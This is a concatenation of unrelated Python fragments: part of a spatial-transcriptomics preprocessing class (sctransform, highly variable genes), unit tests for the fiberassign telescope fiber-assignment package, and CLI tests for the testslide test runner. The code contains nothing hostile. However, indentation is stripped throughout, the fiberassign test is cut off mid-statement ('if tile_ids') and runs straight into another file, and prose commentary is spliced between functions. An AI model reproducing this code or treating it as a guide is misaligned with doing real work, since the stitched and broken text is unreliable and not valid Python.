:param inplace: whether to normalize the expression matrix in place or store the result in self.result.
:param res_key: the key for getting the result from self.result.
:return:
"""
if issparse(self.data.exp_matrix):
self.data.exp_matrix = self.data.exp_matrix.toarray()
if inplace:
self.data.exp_matrix = zscore_disksmooth(self.data.exp_matrix, self.data.position, r)
else:
self.result[res_key] = zscore_disksmooth(self.data.exp_matrix, self.data.position, r)
@logit
def sctransform(self,
method="theta_ml",
n_cells=5000,
n_genes=2000,
filter_hvgs=False,
res_clip_range="seurat",
var_features_n=3000,
inplace=True,
res_key='sctransform'):
"""
scTransform, following Seurat's implementation.
:param method: offset, theta_ml, theta_lbfgs, alpha_lbfgs.
:param n_cells: Number of cells to use for estimating parameters in step 1; default is 5000.
:param n_genes: Number of genes to use for estimating parameters in step 1; default is 2000.
:param filter_hvgs: bool.
:param res_clip_range: string or list
options: 1)"seurat": Clips residuals to -sqrt(ncells/30), sqrt(ncells/30)
2)"default": Clips residuals to -sqrt(ncells), sqrt(ncells)
only used when filter_hvgs is true.
:param var_features_n: Number of variable features to select (for calculating a subset of pearson residuals).
:param inplace: whether to transform the original data in place or operate on a deep copy.
:param res_key: the key for getting the result from the self.result.
:return:
"""
from ..preprocess.sc_transform import sc_transform
if inplace:
self.result[res_key] = sc_transform(self.data, method, n_cells, n_genes, filter_hvgs,
res_clip_range, var_features_n)
else:
import copy
data = copy.deepcopy(self.data)
self.result[res_key] = sc_transform(data, method, n_cells, n_genes, filter_hvgs,
res_clip_range, var_features_n)
key = 'sct'
self.reset_key_record(key, res_key)
@logit
def highly_variable_genes(self,
groups=None,
method: Optional[str] = 'seurat',
n_top_genes: Optional[int] = 2000,
min_disp: Optional[float] = 0.5,
max_disp: Optional[float] = np.inf,
min_mean: Optional[float] = 0.0125,
max_mean: Optional[float] = 3,
span: Optional[float] = 0.3,
n_bins: int = 20, res_key='highly_variable_genes'):
"""
Annotate highly variable genes (adapted from scanpy).
:param groups: If specified, highly-variable genes are selected within each batch separately and merged.
This simple process avoids the selection of batch-specific genes and acts as a
lightweight batch correction method. For all flavors, genes are first sorted
by how many batches they are a HVG. For dispersion-based flavors ties are broken
by normalized dispersion. If `flavor = 'seurat_v3'`, ties are broken by the median
(across batches) rank based on within-batch normalized variance.
:param method: Choose the flavor for identifying highly variable genes. For the dispersion
based methods in their default workflows, Seurat passes the cutoffs whereas
Cell Ranger passes `n_top_genes`.
:param n_top_genes: Number of highly-variable genes to keep. Mandatory if `flavor='seurat_v3'`.
:param min_disp: If `n_top_genes` is not `None`, this and all other cutoffs for the means and the
normalized dispersions are ignored. Ignored if `flavor='seurat_v3'`.
:param max_disp: If `n_top_genes` is not `None`, this and all other cutoffs for the means and the
normalized dispersions are ignored. Ignored if `flavor='seurat_v3'`.
:param min_mean: If `n_top_genes` is not `None`, this and all other cutoffs for the means and the
normalized dispersions are ignored. Ignored if `flavor='seurat_v3'`.
:param max_mean: If `n_top_genes` is not `None`, this and all other cutoffs for the means and the
normalized dispersions are ignored. Ignored if `flavor='seurat_v3'`.
:param span: The fraction of the data (cells) used when estimating the variance in the loess
model fit if `flavor='seurat_v3'`.
:param n_bins: Number of bins for binning the mean gene expression. Normalization is
done with respect to each bin. If just a single gene falls into a bin,
the normalized dispersion is artificially set to 1. You'll be informed
about this if you set `settings.verbosity = 4`.
:param res_key: the key for getting the result from the self.result.
:return:
"""
from ..tools.highly_variable_genes import HighlyVariableGenes
# py/fiberassign/test/test_assign.py
"""
Test fiberassign target operations.
"""
import os
import shutil
import unittest
from datetime import datetime
import json
import numpy as np
import fitsio
import desimodel
from fiberassign.utils import option_list, GlobalTimers
from fiberassign.hardware import load_hardware
from fiberassign.tiles import load_tiles, Tiles
from fiberassign.targets import (TARGET_TYPE_SCIENCE, TARGET_TYPE_SKY,
TARGET_TYPE_SUPPSKY,
TARGET_TYPE_STANDARD, TARGET_TYPE_SAFE,
Targets, TargetsAvailable, TargetTree,
LocationsAvailable, load_target_file)
from fiberassign.assign import (Assignment, write_assignment_fits,
write_assignment_ascii, merge_results,
read_assignment_fits_tile, run)
from fiberassign.stucksky import stuck_on_sky
from fiberassign.qa import qa_tiles
from fiberassign.vis import plot_tiles, plot_qa
from fiberassign.scripts.assign import parse_assign, run_assign_full
from fiberassign.scripts.plot import parse_plot, run_plot
from fiberassign.scripts.qa import parse_qa, run_qa
from fiberassign.scripts.qa_plot import parse_plot_qa, run_plot_qa
from .simulate import (test_subdir_create, sim_tiles, sim_targets,
sim_focalplane, petal_rotation, test_assign_date,
sim_stuck_sky)
class TestAssign(unittest.TestCase):
def setUp(self):
self.saved_skybricks = os.environ.get('SKYBRICKS_DIR')
if self.saved_skybricks is not None:
del os.environ['SKYBRICKS_DIR']
self.density_science = 5000
self.density_standards = 5000
self.density_sky = 100
self.density_suppsky = 5000
def tearDown(self):
if self.saved_skybricks is not None:
os.environ['SKYBRICKS_DIR'] = self.saved_skybricks
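The setUp/tearDown pair uses the standard save-delete-restore pattern for environment variables, so the test runs with the variable unset and the caller's environment is restored afterwards. A self-contained sketch with a made-up variable name:

```python
import os

KEY = "DEMO_SKYBRICKS_DIR"  # hypothetical name, for illustration only
os.environ[KEY] = "/tmp/original"

# setUp: remember the current value, then remove it for the test
saved = os.environ.get(KEY)
if saved is not None:
    del os.environ[KEY]
assert KEY not in os.environ  # the test sees the variable unset

# tearDown: restore the caller's environment
if saved is not None:
    os.environ[KEY] = saved
print(os.environ[KEY])  # /tmp/original
```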
def test_io(self):
np.random.seed(123456789)
test_dir = test_subdir_create("assign_test_io")
input_mtl = os.path.join(test_dir, "mtl.fits")
input_std = os.path.join(test_dir, "standards.fits")
input_sky = os.path.join(test_dir, "sky.fits")
input_suppsky = os.path.join(test_dir, "suppsky.fits")
tgoff = 0
nscience = sim_targets(
input_mtl,
TARGET_TYPE_SCIENCE,
tgoff,
density=self.density_science
)
tgoff += nscience
nstd = sim_targets(
input_std,
TARGET_TYPE_STANDARD,
tgoff,
density=self.density_standards
)
tgoff += nstd
nsky = sim_targets(
input_sky,
TARGET_TYPE_SKY,
tgoff,
density=self.density_sky
)
tgoff += nsky
nsuppsky = sim_targets(
input_suppsky,
TARGET_TYPE_SUPPSKY,
tgoff,
density=self.density_suppsky
)
tgs = Targets()
load_target_file(tgs, input_mtl)
load_target_file(tgs, input_std)
load_target_file(tgs, input_sky)
load_target_file(tgs, input_suppsky)
# Create a hierarchical triangle mesh lookup of the targets positions
tree = TargetTree(tgs, 0.01)
# Compute the targets available to each fiber for each tile.
fp, exclude, state = sim_focalplane(rundate=test_assign_date)
hw = load_hardware(focalplane=(fp, exclude, state))
tfile = os.path.join(test_dir, "footprint.fits")
sim_tiles(tfile)
tiles = load_tiles(tiles_file=tfile)
tgsavail = TargetsAvailable(hw, tgs, tiles, tree)
# Free the tree
del tree
# Compute the fibers on all tiles available for each target
favail = LocationsAvailable(tgsavail)
# Pass empty map of STUCK positioners that land on good sky
stucksky = {}
# First pass assignment
asgn = Assignment(tgs, tgsavail, favail, stucksky)
asgn.assign_unused(TARGET_TYPE_SCIENCE)
# Write out, merge, read back in and verify
write_assignment_ascii(tiles, asgn, out_dir=test_dir,
out_prefix="test_io_ascii_")
write_assignment_fits(tiles, asgn, out_dir=test_dir,
out_prefix="basic_", all_targets=False)
write_assignment_fits(tiles, asgn, out_dir=test_dir,
out_prefix="full_", all_targets=True)
plotpetals = [0]
# plotpetals = None
plot_tiles(hw, tiles, result_dir=test_dir,
result_prefix="basic_", plot_dir=test_dir,
plot_prefix="basic_",
result_split_dir=False, petals=plotpetals,
serial=True)
plot_tiles(hw, tiles, result_dir=test_dir,
result_prefix="full_", plot_dir=test_dir,
plot_prefix="full_",
result_split_dir=False, petals=plotpetals,
serial=True)
target_files = [
input_mtl,
input_sky,
input_std
]
tile_ids = list(tiles.id)
merge_results(target_files, list(), tile_ids, result_dir=test_dir,
result_prefix="basic_", out_dir=test_dir,
out_prefix="basic_tile-", copy_fba=False)
merge_results(target_files, list(), tile_ids, result_dir=test_dir,
result_prefix="full_", out_dir=test_dir,
out_prefix="full_tile-", copy_fba=False)
# Here we test reading with the standard reading function
for tid in tile_ids:
tdata = asgn.tile_location_target(tid)
avail = tgsavail.tile_data(tid)
# Check basic format
infile = os.path.join(test_dir,
"basic_tile-{:06d}.fits".format(tid))
inhead, fiber_data, targets_data, avail_data, gfa_targets = \
read_assignment_fits_tile((tid, infile))
for lid, tgid, tgra, tgdec in zip(
fiber_data["LOCATION"],
fiber_data["TARGETID"],
fiber_data["TARGET_RA"],
fiber_data["TARGET_DEC"]):
if tgid >= 0:
self.assertEqual(tgid, tdata[lid])
props = tgs.get(tgid)
self.assertEqual(tgra, props.ra)
self.assertEqual(tgdec, props.dec)
# Check full format
infile = os.path.join(test_dir,
"full_tile-{:06d}.fits".format(tid))
inhead, fiber_data, targets_data, avail_data, gfa_targets = \
read_assignment_fits_tile((tid, infile))
for lid, tgid, tgra, tgdec in zip(
fiber_data["LOCATION"],
fiber_data["TARGETID"],
fiber_data["TARGET_RA"],
fiber_data["TARGET_DEC"]):
if tgid >= 0:
self.assertEqual(tgid, tdata[lid])
props = tgs.get(tgid)
self.assertEqual(tgra, props.ra)
self.assertEqual(tgdec, props.dec)
# Now read the files directly with fitsio and verify against the input
# target data.
for tid in tile_ids:
tdata = asgn.tile_location_target(tid)
avail = tgsavail.tile_data(tid)
# Check basic format
infile = os.path.join(test_dir,
"basic_tile-{:06d}.fits".format(tid))
fdata = fitsio.FITS(infile, "r")
fassign = fdata["FIBERASSIGN"].read()
ftargets = fdata["TARGETS"].read()
for lid, tgid, tgra, tgdec, tgsub, tgprior, tgobs in zip(
fassign["LOCATION"],
fassign["TARGETID"],
fassign["TARGET_RA"],
fassign["TARGET_DEC"],
fassign["SUBPRIORITY"],
fassign["PRIORITY"],
fassign["OBSCONDITIONS"]):
if tgid >= 0:
self.assertEqual(tgid, tdata[lid])
props = tgs.get(tgid)
self.assertEqual(tgra, props.ra)
self.assertEqual(tgdec, props.dec)
self.assertEqual(tgsub, props.subpriority)
self.assertEqual(tgprior, props.priority)
self.assertEqual(tgobs, props.obscond)
for tgid, tgra, tgdec, tgsub, tgprior, tgobs in zip(
ftargets["TARGETID"],
ftargets["RA"],
ftargets["DEC"],
ftargets["SUBPRIORITY"],
ftargets["PRIORITY"],
ftargets["OBSCONDITIONS"]):
props = tgs.get(tgid)
self.assertEqual(tgra, props.ra)
self.assertEqual(tgdec, props.dec)
self.assertEqual(tgsub, props.subpriority)
self.assertEqual(tgprior, props.priority)
self.assertEqual(tgobs, props.obscond)
# Check full format
infile = os.path.join(test_dir,
"full_tile-{:06d}.fits".format(tid))
fdata = fitsio.FITS(infile, "r")
fassign = fdata["FIBERASSIGN"].read()
ftargets = fdata["TARGETS"].read()
for lid, tgid, tgra, tgdec, tgsub, tgprior, tgobs in zip(
fassign["LOCATION"],
fassign["TARGETID"],
fassign["TARGET_RA"],
fassign["TARGET_DEC"],
fassign["SUBPRIORITY"],
fassign["PRIORITY"],
fassign["OBSCONDITIONS"]):
if tgid >= 0:
self.assertEqual(tgid, tdata[lid])
props = tgs.get(tgid)
self.assertEqual(tgra, props.ra)
self.assertEqual(tgdec, props.dec)
self.assertEqual(tgsub, props.subpriority)
self.assertEqual(tgprior, props.priority)
self.assertEqual(tgobs, props.obscond)
for tgid, tgra, tgdec, tgsub, tgprior, tgobs in zip(
ftargets["TARGETID"],
ftargets["RA"],
ftargets["DEC"],
ftargets["SUBPRIORITY"],
ftargets["PRIORITY"],
ftargets["OBSCONDITIONS"]):
props = tgs.get(tgid)
self.assertEqual(tgra, props.ra)
self.assertEqual(tgdec, props.dec)
self.assertEqual(tgsub, props.subpriority)
self.assertEqual(tgprior, props.priority)
self.assertEqual(tgobs, props.obscond)
plot_tiles(hw, tiles, result_dir=test_dir,
result_prefix="basic_tile-", plot_dir=test_dir,
plot_prefix="basic_tile-",
result_split_dir=False, petals=plotpetals,
serial=True)
plot_tiles(hw, tiles, result_dir=test_dir,
result_prefix="full_tile-", plot_dir=test_dir,
plot_prefix="full_tile-",
result_split_dir=False, petals=plotpetals,
serial=True)
return
def test_stucksky(self):
return self.test_full(do_stucksky=True)
def test_full(self, do_stucksky=False):
test_dir = test_subdir_create("assign_test_full")
np.random.seed(123456789)
input_mtl = os.path.join(test_dir, "mtl.fits")
input_std = os.path.join(test_dir, "standards.fits")
input_sky = os.path.join(test_dir, "sky.fits")
input_suppsky = os.path.join(test_dir, "suppsky.fits")
tgoff = 0
nscience = sim_targets(
input_mtl,
TARGET_TYPE_SCIENCE,
tgoff,
density=self.density_science
)
tgoff += nscience
nstd = sim_targets(
input_std,
TARGET_TYPE_STANDARD,
tgoff,
density=self.density_standards
)
tgoff += nstd
nsky = sim_targets(
input_sky,
TARGET_TYPE_SKY,
tgoff,
density=self.density_sky
)
tgoff += nsky
nsuppsky = sim_targets(
input_suppsky,
TARGET_TYPE_SUPPSKY,
tgoff,
density=self.density_suppsky
)
tgs = Targets()
load_target_file(tgs, input_mtl)
load_target_file(tgs, input_std)
load_target_file(tgs, input_sky)
load_target_file(tgs, input_suppsky)
# Create a hierarchical triangle mesh lookup of the targets positions
tree = TargetTree(tgs, 0.01)
# Read hardware properties
fp, exclude, state = sim_focalplane(rundate=test_assign_date)
hw = load_hardware(focalplane=(fp, exclude, state))
tfile = os.path.join(test_dir, "footprint.fits")
sim_tiles(tfile)
tiles = load_tiles(tiles_file=tfile)
if do_stucksky:
sim_stuck_sky(test_dir, hw, tiles)
# Compute the targets available to each fiber for each tile.
tgsavail = TargetsAvailable(hw, tgs, tiles, tree)
# Free the tree
del tree
# Compute the fibers on all tiles available for each target
favail = LocationsAvailable(tgsavail)
# Pass empty map of STUCK positioners that land on good sky
stucksky = None
if do_stucksky:
stucksky = stuck_on_sky(hw, tiles)
if stucksky is None:
# (the pybind code doesn't like None when a dict is expected...)
stucksky = {}
# Create assignment object
asgn = Assignment(tgs, tgsavail, favail, stucksky)
run(asgn)
write_assignment_fits(tiles, asgn, out_dir=test_dir, all_targets=True,
stucksky=stucksky)
plotpetals = [0]
#plotpetals = None
plot_tiles(hw, tiles, result_dir=test_dir, plot_dir=test_dir,
result_prefix="fba-",
real_shapes=True, petals=plotpetals, serial=True)
qa_tiles(hw, tiles, result_dir=test_dir)
qadata = None
with open(os.path.join(test_dir, "qa.json"), "r") as f:
qadata = json.load(f)
for tile, props in qadata.items():
self.assertTrue(props["assign_science"] >= 4485)
self.assertEqual(100, props["assign_std"])
if do_stucksky:
# We get 3 stuck positioners landing on good sky!
self.assertTrue(
(props["assign_sky"] + props["assign_suppsky"]) >= 397
)
else:
self.assertTrue(
(props["assign_sky"] + props["assign_suppsky"]) >= 400
)
plot_qa(qadata, os.path.join(test_dir, "qa"), outformat="pdf",
labels=True)
return
def test_cli(self):
test_dir = test_subdir_create("assign_test_cli")
np.random.seed(123456789)
input_mtl = os.path.join(test_dir, "mtl.fits")
input_std = os.path.join(test_dir, "standards.fits")
input_sky = os.path.join(test_dir, "sky.fits")
input_suppsky = os.path.join(test_dir, "suppsky.fits")
tgoff = 0
nscience = sim_targets(
input_mtl,
TARGET_TYPE_SCIENCE,
tgoff,
density=self.density_science
)
tgoff += nscience
nstd = sim_targets(
input_std,
TARGET_TYPE_STANDARD,
tgoff,
density=self.density_standards
)
tgoff += nstd
nsky = sim_targets(
input_sky,
TARGET_TYPE_SKY,
tgoff,
density=self.density_sky
)
tgoff += nsky
nsuppsky = sim_targets(
input_suppsky,
TARGET_TYPE_SUPPSKY,
tgoff,
density=self.density_suppsky
)
tfile = os.path.join(test_dir, "footprint.fits")
sim_tiles(tfile)
opts = {
"targets": [input_mtl, input_std, input_sky, input_suppsky],
"dir": test_dir,
"footprint": tfile,
"standards_per_petal": 10,
"sky_per_petal": 40,
"overwrite": True,
"rundate": test_assign_date
}
optlist = option_list(opts)
args = parse_assign(optlist)
run_assign_full(args)
plotpetals = "0"
#plotpetals = "0,1,2,3,4,5,6,7,8,9"
opts = {
"footprint": tfile,
"dir": test_dir,
"petals": plotpetals,
"serial": True,
"rundate": test_assign_date
}
optlist = option_list(opts)
args = parse_plot(optlist)
run_plot(args)
opts = {
"dir": test_dir
}
optlist = option_list(opts)
args = parse_qa(optlist)
run_qa(args)
opts = {
"qafile": os.path.join(test_dir, "qa.json")
}
optlist = option_list(opts)
args = parse_plot_qa(optlist)
run_plot_qa(args)
with open(os.path.join(test_dir, "qa.json"), "r") as f:
qadata = json.load(f)
for tile, props in qadata.items():
self.assertTrue(props["assign_science"] >= 4490)
self.assertEqual(100, props["assign_std"])
self.assertTrue(
(props["assign_sky"] + props["assign_suppsky"]) >= 400
)
return
def test_fieldrot(self):
test_dir = test_subdir_create("assign_test_fieldrot")
np.random.seed(123456789)
input_mtl = os.path.join(test_dir, "mtl.fits")
input_std = os.path.join(test_dir, "standards.fits")
input_sky = os.path.join(test_dir, "sky.fits")
input_suppsky = os.path.join(test_dir, "suppsky.fits")
tgoff = 0
nscience = sim_targets(
input_mtl,
TARGET_TYPE_SCIENCE,
tgoff,
density=self.density_science
)
tgoff += nscience
nstd = sim_targets(
input_std,
TARGET_TYPE_STANDARD,
tgoff,
density=self.density_standards
)
tgoff += nstd
nsky = sim_targets(
input_sky,
TARGET_TYPE_SKY,
tgoff,
density=self.density_sky
)
tgoff += nsky
nsuppsky = sim_targets(
input_suppsky,
TARGET_TYPE_SUPPSKY,
tgoff,
density=self.density_suppsky
)
# Simulate the tiles
tfile = os.path.join(test_dir, "footprint.fits")
sim_tiles(tfile)
# petal mapping
rotator = petal_rotation(1, reverse=False)
rots = [0, 36]
tile_ids = None
for rt in rots:
odir = "theta_{:02d}".format(rt)
tgs = Targets()
load_target_file(tgs, input_mtl)
load_target_file(tgs, input_std)
load_target_file(tgs, input_sky)
load_target_file(tgs, input_suppsky)
# Create a hierarchical triangle mesh lookup of the targets
# positions
tree = TargetTree(tgs, 0.01)
# Manually override the field rotation
tiles = load_tiles(tiles_file=tfile, obstheta=float(rt))
if tile_ids
# tests/cli_unittest.py
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import copy
import os
import os.path
import pty
import re
import subprocess
import sys
import threading
import unittest
import testslide
class TestCliBase(unittest.TestCase):
SAMPLE_TESTS_PATH = os.path.dirname(__file__) + "/sample_tests.py"
def setUp(self):
self.argv = [self.SAMPLE_TESTS_PATH]
self.env = {
"COVERAGE_PROCESS_START": ".coveragerc",
}
super(TestCliBase, self).setUp()
def run_testslide(
self,
tty_stdout=False,
expected_return_code=0,
expected_stdout=None,
expected_stdout_startswith=None,
expected_in_stdout=None,
expected_not_in_stdout=None,
expected_regex_in_stdout=None,
show_testslide_stack_trace=True,
):
args = [
sys.executable,
"-m",
"testslide.cli",
]
if show_testslide_stack_trace:
args.append("--show-testslide-stack-trace")
args.extend(self.argv)
env = dict(copy.copy(os.environ))
env.update(self.env)
if tty_stdout:
stdout_master_fd, stdout_slave_fd = pty.openpty()
encoding = sys.getdefaultencoding()
with subprocess.Popen(
args,
bufsize=1,
stdin=subprocess.DEVNULL,
stdout=stdout_slave_fd if tty_stdout else subprocess.PIPE,
stderr=subprocess.PIPE,
encoding=encoding,
env=env,
universal_newlines=True,
) as popen:
stdout_chunks = []
stderr_chunks = []
def _process_output(fd, callback):
while True:
try:
chunk = os.read(fd, 8192)
except OSError:
break
if len(chunk):
callback(chunk)
else:
break
if tty_stdout:
stdout_fileno = stdout_master_fd
else:
stdout_fileno = popen.stdout.fileno()
process_stdout_thread = threading.Thread(
target=_process_output,
name="process_stdout",
args=(stdout_fileno, lambda line: stdout_chunks.append(line)),
)
process_stdout_thread.start()
process_stderr_thread = threading.Thread(
target=_process_output,
name="process_stderr",
args=(popen.stderr.fileno(), lambda line: stderr_chunks.append(line)),
)
process_stderr_thread.start()
return_code = popen.wait()
if tty_stdout:
os.close(stdout_slave_fd)
process_stdout_thread.join()
process_stderr_thread.join()
stdout_output = "".join(chunk.decode(encoding) for chunk in stdout_chunks)
stderr_output = "".join(chunk.decode(encoding) for chunk in stderr_chunks)
output = ""
if stdout_output:
output += f"STDOUT:\n{stdout_output}\n"
if stderr_output:
output += f"STDERR:\n{stderr_output}\n"
self.assertEqual(
return_code,
expected_return_code,
f"Command {args} returned {return_code}, "
f"expected {expected_return_code}.\n{output}",
)
if expected_stdout:
self.assertEqual(
stdout_output,
expected_stdout,
                f"Command {args} expected to have this stdout:\n\n"
f"{expected_stdout}\n\n"
f"But output was different:\n"
f"{stdout_output}",
)
if expected_stdout_startswith:
self.assertTrue(
stdout_output.startswith(expected_stdout_startswith),
                f"Command {args} expected to have its stdout starting with:\n\n"
f"{expected_stdout_startswith}\n\n"
f"But output was different:\n"
f"{stdout_output}",
)
if expected_in_stdout:
self.assertTrue(
expected_in_stdout in stdout_output,
                f"Command {args} expected to have in its stdout:\n\n"
f"{expected_in_stdout}\n\n"
f"But output was different:\n"
f"{stdout_output}",
)
if expected_not_in_stdout:
self.assertTrue(
expected_not_in_stdout not in stdout_output,
                f"Command {args} expected to not have in its stdout:\n\n"
f"{expected_not_in_stdout}\n\n"
f"But output was different:\n"
f"{stdout_output}",
)
if expected_regex_in_stdout:
self.assertTrue(
re.fullmatch(expected_regex_in_stdout, stdout_output, flags=re.DOTALL),
                f"Command {args} expected to have its stdout matching the regexp:\n\n"
f"{expected_regex_in_stdout}\n\n"
f"But output was different:\n"
f"{stdout_output}",
)
@staticmethod
def white(text):
return "\x1b[0m\x1b[1m{}\x1b[0m".format(text)
@staticmethod
def green(text):
return "\x1b[0m\x1b[32m{}\x1b[0m".format(text)
@staticmethod
def red(text):
return "\x1b[0m\x1b[31m{}\x1b[0m".format(text)
@staticmethod
def yellow(text):
return "\x1b[0m\x1b[33m{}\x1b[0m".format(text)
@staticmethod
def cyan(text):
return "\x1b[0m\x1b[36m{}\x1b[0m".format(text)
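The color helpers above build ANSI SGR escape sequences by hand: `"\x1b[<n>m"` selects a rendition and `"\x1b[0m"` resets all attributes. A minimal sketch of the same pattern, with `colorize` as an illustrative generalization:

```python
# ANSI SGR: "\x1b[<n>m" selects a rendition; "\x1b[0m" resets attributes.
RESET = "\x1b[0m"

def colorize(text, code):
    # reset, select color, text, reset -- mirrors the helpers above
    return "{reset}\x1b[{code}m{text}{reset}".format(
        reset=RESET, code=code, text=text
    )

print(repr(colorize("PASS", 32)))  # SGR code 32 is green, as in green() above
```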
class TestCliList(TestCliBase):
def setUp(self):
super().setUp()
self.argv.insert(0, "--list")
def test_list(self):
"""
With --list, print test names one per line.
"""
self.run_testslide(
expected_stdout=(
"top context: passing example\n"
"top context: failing example\n"
"top context: focused example\n"
"top context: skipped example\n"
"top context: unittest SkipTest\n"
"top context, nested context: passing nested example\n"
"tests.sample_tests.SampleTestCase: test_failing\n"
"tests.sample_tests.SampleTestCase: test_passing\n"
"tests.sample_tests.SampleTestCase: test_skipped\n"
)
)
class TestCliQuiet(TestCliBase):
def setUp(self):
super().setUp()
self.env = {"PRINT": "True"}
def test_with_quiet(self):
"""
With --quiet, swallow both stderr and stdout unless the test fails.
"""
self.argv.insert(0, "--quiet")
self.run_testslide(
expected_return_code=1,
expected_stdout_startswith=(
"top context\n"
" passing example: PASS\n"
"stdout:\n"
"failing_example stdout\n"
"\n"
"stderr:\n"
"failing_example stderr\n"
"\n"
" failing example: SimulatedFailure: test failure (extra)\n"
" *focused example: PASS\n"
" skipped example: SKIP\n"
" unittest SkipTest: SKIP\n"
" nested context\n"
" passing nested example: PASS\n"
"tests.sample_tests.SampleTestCase\n"
"stdout:\n"
"test_fail stdout\n"
"\n"
"stderr:\n"
"test_fail stderr\n"
"\n"
" test_failing: AssertionError: Third\n"
" test_passing: PASS\n"
" test_skipped: SKIP\n"
"\n"
"Failures:\n"
# TODO Rest of the output
),
)
def test_without_quiet(self):
"""
        Without --quiet, let test stdout and stderr pass through.
"""
self.run_testslide(
expected_return_code=1,
expected_stdout_startswith=(
"top context\n"
"passing_example stdout\n"
" passing example: PASS\n"
"failing_example stdout\n"
" failing example: SimulatedFailure: test failure (extra)\n"
"focused_example stdout\n"
" *focused example: PASS\n"
" skipped example: SKIP\n"
"unittest_SkipTest stdout\n"
" unittest SkipTest: SKIP\n"
" nested context\n"
"passing_nested_example stdout\n"
" passing nested example: PASS\n"
"tests.sample_tests.SampleTestCase\n"
"test_fail stdout\n"
" test_failing: AssertionError: Third\n"
"test_pass stdout\n"
" test_passing: PASS\n"
" test_skipped: SKIP\n"
"\n"
"Failures:\n"
# TODO Rest of the output
),
)
class FormatterMixin:
def test_prints_exceptions_with_cause(self):
self.run_testslide(
tty_stdout=True,
expected_return_code=1,
expected_in_stdout=(
' File \033[36m"tests/sample_tests.py"\033[39;49;00m, line \033[34m76\033[39;49;00m, in test_failing\r\n'
' \033[34mraise\033[39;49;00m \033[36mAssertionError\033[39;49;00m(\033[33m"\033[39;49;00m\033[33mThird\033[39;49;00m\033[33m"\033[39;49;00m) \033[34mfrom\033[39;49;00m \033[04m\033[36mcause\033[39;49;00m\r\n'
"\033[0m\033[31m Caused by \033[0m\033[0m\033[31mAssertionError: Second\033[0m\r\n"
' File \033[36m"tests/sample_tests.py"\033[39;49;00m, line \033[34m74\033[39;49;00m, in test_failing\r\n'
' \033[34mraise\033[39;49;00m \033[36mAssertionError\033[39;49;00m(\033[33m"\033[39;49;00m\033[33mSecond\033[39;49;00m\033[33m"\033[39;49;00m) \033[34mfrom\033[39;49;00m \033[04m\033[36mcause\033[39;49;00m\r\n'
"\033[0m\033[31m Caused by \033[0m\033[0m\033[31mAssertionError: First\033[0m\r\n"
' File \033[36m"tests/sample_tests.py"\033[39;49;00m, line \033[34m72\033[39;49;00m, in test_failing\r\n'
' \033[34mraise\033[39;49;00m \033[36mAssertionError\033[39;49;00m(\033[33m"\033[39;49;00m\033[33mFirst\033[39;49;00m\033[33m"\033[39;49;00m)\r\n'
),
)
def test_default_trim_path_prefix(self):
"""
Default value for --trim-path-prefix trims path shared with
testslide itself.
"""
self.run_testslide(
expected_return_code=1,
expected_in_stdout=('File "tests/sample_tests.py", line'),
)
def test_nonempty_trim_path_prefix(self):
"""
Trims prefix passed to --trim-path-prefix.
"""
self.argv.append("--trim-path-prefix")
self.argv.append(os.path.dirname(self.SAMPLE_TESTS_PATH) + "/")
self.run_testslide(
expected_return_code=1,
expected_in_stdout=(
'File "' + os.path.basename(self.SAMPLE_TESTS_PATH) + '", line'
),
)
def test_empty_trim_path_prefix(self):
"""
Trims nothing if '' passed to --trim-path-prefix.
"""
self.argv.append("--trim-path-prefix")
self.argv.append("")
self.run_testslide(
expected_return_code=1,
expected_in_stdout=('File "' + self.SAMPLE_TESTS_PATH + '", line'),
)
def test_not_show_testslide_stack_trace(self):
self.run_testslide(
expected_return_code=1,
show_testslide_stack_trace=False,
expected_not_in_stdout=os.path.abspath(os.path.dirname(testslide.__file__)),
)
class TestCliDocumentFormatter(FormatterMixin, TestCliBase):
def setUp(self):
super().setUp()
self.argv = ["--format", "documentation"] + self.argv
def test_colored_output_to_terminal(self):
"""
Execute all examples in the order defined with colored output.
"""
self.run_testslide(
tty_stdout=True,
expected_return_code=1,
expected_stdout_startswith=(
self.white("top context")
+ "\r\n"
+ self.green(" passing example")
+ "\r\n"
+ self.red(" failing example: SimulatedFailure: test failure (extra)")
+ "\r\n"
+ self.green(" *focused example")
+ "\r\n"
+ self.yellow(" skipped example")
+ "\r\n"
+ self.yellow(" unittest SkipTest")
+ "\r\n"
+ self.white(" nested context")
+ "\r\n"
+ self.green(" passing nested example")
+ "\r\n"
# TODO Rest of the output
),
)
def test_colored_output_with_force_color(self):
"""
Execute all examples in the order defined with colored output.
"""
self.argv.append("--force-color")
self.run_testslide(
expected_return_code=1,
expected_stdout_startswith=(
self.white("top context")
+ "\n"
+ self.green(" passing example")
+ "\n"
+ self.red(" failing example: SimulatedFailure: test failure (extra)")
+ "\n"
+ self.green(" *focused example")
+ "\n"
+ self.yellow(" skipped example")
+ "\n"
+ self.yellow(" unittest SkipTest")
+ "\n"
+ self.white(" nested context")
+ "\n"
+ self.green(" passing nested example")
+ "\n"
# TODO add remaining bits of the output (using regexes)
),
)
def test_plain_output_without_terminal(self):
"""
Execute all examples in the order defined without color.
"""
self.run_testslide(
expected_return_code=1,
expected_stdout_startswith=(
"top context\n"
" passing example: PASS\n"
" failing example: SimulatedFailure: test failure (extra)\n"
" *focused example: PASS\n"
" skipped example: SKIP\n"
" unittest SkipTest: SKIP\n"
" nested context\n"
" passing nested example: PASS\n"
"tests.sample_tests.SampleTestCase\n"
" test_failing: AssertionError: Third\n"
" test_passing: PASS\n"
" test_skipped: SKIP\n"
"\n"
"Failures:\n"
# TODO add remaining bits of the output (using regexes)
),
)
def test_shuffle(self):
"""
Shuffle execution order.
"""
self.argv.append("--shuffle")
self.argv.append("--seed")
self.argv.append("33")
self.run_testslide(
expected_return_code=1,
expected_stdout_startswith=(
"top context\n"
" passing example: PASS\n"
" unittest SkipTest: SKIP\n"
" nested context\n"
" passing nested example: PASS\n"
" failing example: SimulatedFailure: test failure (extra)\n"
"tests.sample_tests.SampleTestCase\n"
" test_passing: PASS\n"
" test_skipped: SKIP\n"
" test_failing: AssertionError: Third\n"
"top context\n"
" skipped example: SKIP\n"
" *focused example: PASS\n"
"\n"
"Failures:\n"
# TODO add remaining bits of the output (using regexes)
),
)
def test_focus(self):
"""
Execute only focused examples.
"""
self.argv.append("--focus")
self.run_testslide(
expected_stdout_startswith=(
"top context\n"
" *focused example: PASS\n"
"\n"
"Finished 1 example(s) in "
# TODO add remaining bits of the output (using regexes)
)
)
def test_fail_if_focus(self):
"""
Fail because there are focused tests and --fail-if-focused
"""
